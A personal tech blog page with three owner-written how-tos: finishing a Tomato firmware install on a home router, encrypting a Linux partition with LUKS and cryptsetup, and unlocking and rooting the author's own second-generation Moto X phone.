  • Under the Administration menu, click Firmware Upgrade.
  • In the New Firmware File field, click Browse to locate the new firmware file that you downloaded in the previous step
  • Click Upload. The uploading process takes about 5 minutes.
  • Then unplug the router, wait 30 seconds.
  • Hold down the WPS button while plugging it back in.
  • Wait 30 seconds and release the WPS button.

Now you should be using the new firmware.

  • Browse to 192.168.1.1
  • Login as admin/password (if that doesn’t work try admin/admin)
  • Click on the ‘reset nvram to defaults’ link in the page that comes up. (I had to do this before the system started working but apparently its not always required.)

Configure your new firmware

That’s it, you have a router with a working Tomato install. Go ahead and configure it as per your requirements. All functionality seems to be working for me except the 5GHz network which seems to have disappeared. I will play around with the settings a bit more to see if I can get it to work but as I hardly ever connected to the 5GHz network its not a big deal for me.

References

The following sites and posts helped me complete the install successfully. Without them I would have spent way longer getting things to work:

Well this is it for now. Will post more later.

– Suramya

February 20, 2016

How to encrypt your Hard-drive in Linux

We have heard multiple stories where someone looses a pendrive or a laptop containing sensitive/private data which is then published by the person who found the drive embarrassing the owner of the data. The best way to prevent something like that from happening to you if you loose a disk is to make sure all your data is encrypted. Historically this used to be quite painful to setup and required a lost of technical know-how. Thankfully this is no longer the case. After trying a bunch of different options I found Linux Unified Key Setup-on-disk-format (LUKS) to be the most user-friendly and easy to setup option for me.

Setting it up is quite easy by following the instructions over at www.cyberciti.biz. However since things on the internet have a tendency of disappearing on a fairly frequent basis, I am using this post to save a paraphrased version of the installation instructions (along with my notes/comments) just in case the original site goes down and I need to reinstall. All credit goes to original author. So without further ado here we go:

Install cryptsetup

First we need to install cryptsetup utility which contains all the utilities we need to encrypt our drive. To install it in Debian/Ubuntu you just issue the following command as root:

apt-get install cryptsetup

Configure LUKS partition

Warning: This will remove all data on the partition that you are encrypting. So make sure you have a working backup before proceeding amd don’t blame me if you manage to destroy your data/device.

Run the following command as root to start the encryption process:

cryptsetup -y -v luksFormat <device>

where <device> is the partition we want to encrypt (e.g. /dev/sda1). The command will ask you for confirmation and a passphrase. This passphrase is not recoverable so make sure you don’t forget it.

Create drive mapping

Once the previous command completes you need to create a mapping of the encrypted drive by issuing the following command:

cryptsetup luksOpen <device> backup2

You can also map a partition to using its UUID (which is what I do) by issuing the following command instead (This works great if you want to script automated backups to an external drive):

cryptsetup luksOpen UUID=88848060-fab7-4e9e-bac2-f9a2323c7c29 backup2

Replace the UUID in the example with the UUID of your drive. (Instructions on how to find the UUID are available here).

Use the following command to see the status for the mapping and to check if the command succeeded:

cryptsetup -v status backup2

Format LUKS partition

Now that we have created the mapping we need to write zeroes to the encrypted device, to ensure that the outside world sees this as random data and protects the system against disclosure of usage by issuing the following command:

dd if=/dev/zero of=/dev/mapper/backup2

Since this command can take a long time to complete depending on the drive size and dd by default doesn’t give any feedback on the percentage completed/remaining I recommend that you use the pv command to monitor the progress by issuing the following command instead:

pv -tpreb /dev/zero | dd of=/dev/mapper/backup2 bs=128M

This will take a while to run so you can go for a walk or read a book while it runs. Once the command completes you can create a filesystem on the device (I prefer to use ext4 but you can use any filesystem you like) by formatting the device:

mkfs.ext4 /dev/mapper/backup2

After the filesystem is created you can mount and use the partition as usual by issuing the following command:

mount /dev/mapper/backup2 /mnt/backup

That’s it. You now have an encrypted partition that shows up as a regular partition in Linux which you can use as a regular drive without having to worry about anything. No special changes are needed to use this partition which means any software can use it without requiring changes.

How to unmount and secure the data

After you are done transferring data to/from the drive you can unmount and secure the partition by issuing the following commands as root:

umount /mnt/backup

followed by

cryptsetup luksClose backup2

Creating a backup of the LUKS headers

Before you start anything else, you should create a backup copy of the LUKS header because if this header gets corrupted somehow then all data in the encrypted partition is lost forever with no way to recover it. From the cryptsetup man page:

“LUKS header: If the header of a LUKS volume gets damaged, all data is permanently lost unless you have a header-backup. If a key-slot is damaged, it can only be restored from a header-backup or if another active key-slot with known passphrase is undamaged. Damaging the LUKS header is something people manage to do with surprising frequency. This risk is the result of a trade-off between security and safety, as LUKS is designed for fast and secure wiping by just overwriting header and key-slot area.”

Create a backup by issuing the following command:

cryptsetup luksHeaderBackup <device> --header-backup-file <file>

Important note: a LUKS header backup can grant access to most or all data, therefore you need to make sure that nobody has access to it.

In case of disaster where our LUKS header gets broken, we can restore it by issuing the following command:

cryptsetup luksHeaderRestore <device> --header-backup-file <file>

How to remount the encrypted partition?

Issue the following commands in sequence to mount the partition:

cryptsetup luksOpen <device> backup2
mount /dev/mapper/backup2 /mnt/backup

Please note that data encrypted by LUKS is quite obvious with most Linux systems identifying it as an encrypted partition automatically. So if someone examines your system they will know you have encrypted data and can force you to divulge the password by various means (including the use of Rubber-hose Cryptanalysis. )

If you want the encrypted partition to be hidden then you can use Deniable encryption/Hidden Partition or use steganography. I haven’t really used either so can’t comment on how to set it up correctly but maybe I can talk about it in a future post after I explore them a bit more.

Well this is all for now, hope you find this useful. Will write more later.

– Suramya

May 6, 2015

How to Root a second generation Moto x running Lollipop

Filed under: Knowledgebase,Tech Related,Tutorials — Suramya @ 11:22 PM

I got my new phone today and as usual the first thing I did was root it before I started copying data over so that I don’t loose data when I unlock the boot loader. The process required a bit of work mainly because I was following instructions for KitKat while my phone was running Lollipop. That caused the phone to go into this funky state where the Play Store API’s went MIA and the entire thing stopped working to the point that I had to do a hard reset to get back to a stable state.

BTW, before you continue please note that this will delete all data on the phone so you need to ensure that you have a proper backup before proceeding. Without further ado, here are the steps I followed to get things to work using my Linux (Debian) desktop:

Unlock the Bootloder

The first thing you have to do is unlock the Boot loader on the phone:

  • Install the Android SDK by issuing the following command:
    apt-get install android-tools-adb android-tools-fastboot
  • Run the following command:
    fastboot oem get_unlock_data
  • Take the string returned, which would look something like this:
    (bootloader) 0A40040192024205#4C4D3556313230
    (bootloader) 30373731363031303332323239#BD00
    (bootloader) 8A672BA4746C2CE02328A2AC0C39F95
    (bootloader) 1A3E5#1F53280002000000000000000
    (bootloader) 0000000

    and concatenate the 5 lines of output into one continuous string without (bootloader) or ‘INFO’ or white spaces. Your string needs to look like this:
    0A40040192024205#4C4D355631323030373731363031303332323239#BD008A672BA4746C2CE02328A2AC0C39F951A3E5#1F532800020000000000000000000000

  • Visit the Motorola Website.
  • Paste the string you got in the previous step on the site, and then click on the ‘Can my Device be Unlocked?’ button and if your device is unlockable, a “REQUEST UNLOCK KEY” button will now appear at the bottom of the page.
  • Click on the “REQUEST UNLOCK KEY” Button.
  • You will now receive a mail with the unlock key at your registered email address
  • Start your device in fastboot mode by pushing and holding the power and volume down at the same time. Then release the power button followed by the volume down button. The device will now power up in fastboot mode.
  • Run the following command to unlock the bootloader:
    fastboot oem unlock 
  • If the code was correct then you will see a message confirming that your device was unlocked and the phone will reboot.

Enable Developer Options/USB Debugging

In order to proceed further we need to enable USB Debugging and in order to do that we need to enable Developer Options following these steps:

  • Pull down the notification drawer and tap on ‘Settings’
  • Scroll down to ‘About Phone’
  • Now scroll down to ‘Build Number’
  • Tap on ‘Build Number’ 7 times.
  • It’ll now say that you are a developer. Now press back, You should now see Developer Options above About Phone.

  • Click on ‘Developer Options’
  • Check the box next to ‘USB debugging’ and save

Root the Phone

First we need to download the correct image file for the model of your phone. I had to look up my model on Wikipedia because for some reason my phone decided not to share that information with me. Use the appropriate link for your model in the list below. I have a XT1092 but the XT1097 image worked fine for me.

After downloading the file, extract it. Run the following command:

adb reboot bootloader

This will restart the phone in the fastboot mode. Then boot using the image you downloaded in the previous step using this command:

fastboot boot /path/to/image/file/CF-Auto-Root-victara-victararetbr-xt1097.img

Once you run the command the Device will boot up, install su and quickly reboot (this is automatic, no user intervention is required). After the phone starts up, you need to install Chainfire’s SuperSU from the Play Store.

After that you are done and your phone is rooted. You can verify the same by installing a ‘Root Verifier’ application from the store.
Well this is all for now, will write more later.

– Suramya

« Newer PostsOlder Posts »

Powered by WordPress